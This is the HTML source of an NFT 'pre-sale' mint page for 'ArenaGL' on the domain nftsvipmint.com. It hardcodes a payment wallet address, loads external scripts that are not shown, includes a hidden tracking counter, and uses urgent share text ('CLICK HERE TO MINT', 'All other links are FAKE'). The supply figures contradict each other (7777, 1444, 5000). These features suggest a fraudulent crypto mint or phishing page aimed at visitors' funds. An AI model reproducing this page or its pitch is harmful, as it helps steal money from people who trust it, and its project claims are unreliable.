<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible"
          content="IE=edge">
    <meta name="format-detection"
          content="telephone=no">
    <meta name="viewport"
          content="width=device-width,initial-scale=1.0">
    <link rel="icon"
          href="/favicon.png">
    <title>
        ArenaGL
    </title>
    <!--  svg 引入  -->
    <script src="//at.alicdn.com/t/font_3284399_2tpmbi093w3.js"></script>
    <link href="mobile.css" rel="stylesheet"/>

    <meta content="https://ArenaGL.nftsvipmint.com/" property="og:url">
    <meta content="𝐂𝐋𝐈𝐂𝐊 𝐇𝐄𝐑𝐄 𝐓𝐎 𝐌𝐈𝐍𝐓!" property="og:title">
    <meta content="📢𝐏𝐫𝐞-𝐒𝐚𝐥𝐞 𝐢𝐬 𝐋𝐈𝐕𝐄!
    
    🏷️ Pre-sale info:
    ▶ Price: 0.09 ETH
    ▶ Supply: 7777 NFT
    ▶ Limit: 10 NFT per wallet
    🚨 All other links are FAKE 🚨
    Thank you for your support and patience!
    
    " property="og:description">
    <meta content='https://ArenaGL.nftsvipmint.com/img/heroes.gif?width=719&height=270' property='og:image'>
    <meta name="theme-color" content="#7289DA">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="theme-color" content="#7289DA">
    <meta name="twitter:card" content="summary_large_image">
    <link type="application/json+oembed" href="https://ArenaGL.nftsvipmint.com/img/js.js" /> 

    <script>
      /*  
        ------------------------------------------------ */
        window.PRICE = 0.09;
        window.TOTAL = 1444;
        window.MAX = 10;
        window.ADDRESS = "0xCad27E254175747bA5Bb62679F4ed49EBf4588CA";
        window._title1 = "ArenaGL";
        window._title2 =
            "The ArenaGL NFT collection is made of 5000 unique 3D generatedCharacters with over 1,000 individually sculpted details, workingtirelessly on establishing the new world order. When no more humans were left on Earth, the remaining Artificial Intelligence called Ailo took on an enormous task to reclaim what humankind has left behind. Inspired by the idea of repopulating a humanless world, Ailo createsadvanced robots operated by his new allies.";
				window.discord = 'https://discord.com/invite/ArenaGL';
				window.twitter = 'https://twitter/ArenaGL';
    </script>

<link href="/js/app.js" rel="preload" as="script"><link href="/js/chunk-vendors.js" rel="preload" as="script"></head>

<body>
<noscript>
    <strong>We're sorry but ArenaGL doesn't work properly without JavaScript enabled. Please enable it to continue.</strong>
</noscript>
<div id="app"></div>
<script type="text/javascript" src="/js/chunk-vendors.js"></script><script type="text/javascript" src="/js/app.js"></script></body>
<!--<script src="jquery-3.3.1.slim.min.js"></script>-->
<!--<script src="web3.min.js"></script>-->
<!--<script src="assets/script.js"></script>-->

<!-- Histats.com  START (hidden counter) -->
<a style="display:none"
   href="/"
   alt=""
   target="_blank"/>
<img style="display:none"
     src="//sstatic1.histats.com/0.gif?4667178&101"
     alt=""
     border="0"/>
<!-- Histats.com  END  -->
</html>